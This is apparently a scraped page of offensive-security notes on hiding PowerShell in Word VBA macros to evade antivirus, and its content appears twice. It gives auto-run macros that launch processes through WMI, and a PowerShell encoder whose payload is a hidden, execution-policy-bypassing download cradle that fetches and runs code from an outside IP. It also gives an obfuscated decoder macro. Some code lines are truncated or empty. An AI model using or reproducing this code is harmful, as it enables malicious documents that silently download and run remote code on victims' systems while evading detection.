Powershell Inside VBA

Obfuscated (without shell & powershell call)

Last updated 1 year ago

Powershell Inside VBA

Obfuscated (without shell & powershell call)

The use of the Shell method and the clearly identifiable PowerShell download cradle cause high detection rate

Obfuscated and execute with Windows Management Instrumentation (WMI) process creation

Address the issue of PowerShell being a child process of MS Office by using WMI to create a PowerShell process, and hide the WMI & PowerShell download cradle strings

Child process in MS Office: 32-bit ; New process with this method: 64-bit

Function bears(cows)
    bears = StrReverse(cows)
End Function

Sub Mymacro()
Dim strArg As String
strArg = bears()

.Create strArg, Null, Null, pid
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    Mymacro
End Sub

Custom encryptor

vbahelper.ps1

$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/'))"

[string]$output = ""

$payload.ToCharArray() | %{
    [string]$thischar = [byte][char]$_ + 17
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output | clip

runner.doc vba

Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    Oatmilk = Oatmilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function

Function MyMacro()
    ("") Then
      Exit Function
    End If
    
    Dim Apples As String
    Dim Water As String
    
    Apples = 
    Water = Nuts(Apples)
    (Nuts("")).Get(Nuts("")).Create Water, Tea, Coffee, Napkin
End Function

PreviousVBA AV Bypass NextAMSI Bypass

Last updated 1 year ago

The use of the Shell method and the clearly identifiable PowerShell download cradle cause high detection rate

Obfuscated and execute with Windows Management Instrumentation (WMI) process creation

Address the issue of PowerShell being a child process of MS Office by using WMI to create a PowerShell process, and hide the WMI & PowerShell download cradle strings

Child process in MS Office: 32-bit ; New process with this method: 64-bit

Function bears(cows)
    bears = StrReverse(cows)
End Function

Sub Mymacro()
Dim strArg As String
strArg = bears()

.Create strArg, Null, Null, pid
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    Mymacro
End Sub

Custom encryptor

vbahelper.ps1

$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/'))"

[string]$output = ""

$payload.ToCharArray() | %{
    [string]$thischar = [byte][char]$_ + 17
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output | clip

runner.doc vba

Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    Oatmilk = Oatmilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function

Function MyMacro()
    ("") Then
      Exit Function
    End If
    
    Dim Apples As String
    Dim Water As String
    
    Apples = 
    Water = Nuts(Apples)
    (Nuts("")).Get(Nuts("")).Create Water, Tea, Coffee, Napkin
End Function